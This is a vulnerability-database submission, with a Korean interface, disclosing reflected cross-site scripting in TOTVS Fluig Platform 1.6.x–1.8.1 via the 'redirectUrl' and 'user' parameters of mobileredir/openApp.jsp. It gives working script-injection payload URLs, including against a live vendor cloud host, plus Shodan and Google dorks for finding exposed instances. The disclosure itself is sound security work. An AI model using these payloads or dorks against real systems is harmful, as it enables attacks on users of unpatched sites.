| 제목 | Totvs TOTVS Fluig Plataform 1.6.X - 1.8.1 Cross-Site Scripting |
|---|
| 설명 | TOTVS Fluig Plataform 1.6.X - 1.8.1 - Cross-Site Scripting
The TOTVS Fluig platform, in its versions from 1.6.1.X to 1.8.1, is vulnerable to Cross-Site Scripting in the 'redirectUrl' and 'user' parameters within the 'mobileredir' module.
Fluig is the productivity and collaboration platform that integrates with the ERP system, developed by Brazil's largest technology company, TOTVS, and hosted on the client's server.
Versions affecteds:
--
Fluig 1.6.X - Fluig 1.8.1
…
Attack Vector
https://fluig.host.com/mobileredir/openApp.jsp?redirectUrl=
https://fluig.host.com/mobileredir/openApp.jsp?user=
Payloads:
https://fluig.host.com/mobileredir/openApp.jsp?redirectUrl="><script>alert(document.domain)</script>
https://fluig.host.com/mobileredir/openApp.jsp?user="><script>alert(document.domain)</script>
Dorks
Shodan:
https://www.shodan.io/search?query=fluig1
Google Dork:
inurl:"/portal/home" intitle:"Fluig"
intitle:fluig
Examples using a system hosted on Totvs's Fluig cloud:
https://mobile.fluig.com/mobileredir/openApp.jsp?redirectUrl="><script>alert(document.domain)</script>
https://mobile.fluig.com/mobileredir/openApp.jsp?user="><script>alert(document.domain)</script>
|
|---|
| 사용자 | erickfernandox (UID 57733) |
|---|
| 제출 | 2023. 11. 11. AM 12:57 (2 연령 ago) |
|---|
| 모더레이션 | 2023. 11. 24. AM 08:40 (13 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 246104 [TOTVS Fluig Platform 1.6.x/1.7.x/1.8.0/1.8.1 mobileredir /mobileredir/openApp.jsp redirectUrl/user 크로스 사이트 스크립팅] |
|---|
| 포인트들 | 17 |
|---|